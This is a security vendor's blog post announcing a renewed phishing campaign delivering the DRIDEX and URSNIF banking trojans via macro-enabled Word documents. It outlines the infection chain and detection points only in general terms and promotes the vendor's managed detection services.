Phishing Attacks Today: DRIDEX and URSNIF Are Back | Critical Start
Learn real world attack and defense strategies with Adversarial Emulation and Active Defense training from TEAMARES
TEAMARES launches Breach Attack as a Service for quick testing whenever your environment changes.
Webinar Series | Once More unto the Breach | Lessons Learned from Billion Dollar Breaches

Phishing Attacks Today: DRIDEX and URSNIF Are Back

On the morning of December 12th, 2018, the CRITICALSTART CYBERSOC began seeing the resurgence of a prolific phishing campaign. This campaign included malware variants such as DRIDEX & URSNIF, both common Banking Trojans used in macro-based attacks. These files are observed hiding with macro-enabled documents or downloaded after the code executes, requesting the host reach out to a C2 domain. While these aren’t new techniques, the malicious files (and their variants) can still be very effective on unprotected devices. Within the existing tool suite the CRITICALSTART CYBERSOC operates on, we’ve seen the detection and remediation of these malicious files, specifically through EDR and NextGen AV Platforms (machine learning algorithms). This is a great time to verify the security controls across your organization and ensure your policies are up to date for both Endpoint Protection Platforms and Exchange/E-Mail. Additionally, user awareness is the most significant defense against phishing and similar attacks. Being transparent with the user base on how these attacks operate and disguise themselves creates vigilance, and grows a culture of security awareness.

CRITICALSTART’s CYBERSOC has seen it across multiple MDR Clients within the same time-frame, over the last 24hrs. 

  1. C2 Identifiers:
  1. Malware Observed:
    1. URSNIF “3152”
    2. DRIDEX “3101”
  1. Attributes: Identifiable through Exchange / Proofpoint
    1. PowerShell
    2. Office VBA Macro
    3. Banking Trojan
  1. Techniques: Identifiable through EDR and EPP agents locally on the device(s)
    1. Emailed Doc
    2. Word Requests “Enable Macros”
    3. Word Spawn cmd.exe
    4. Cmd.exe runs encoded PowerShell with C2 location
    5. Device pulls directed file (URSNIF/DRIDEX)

Contact an MDR Specialist Today

Get in Touch

Related Content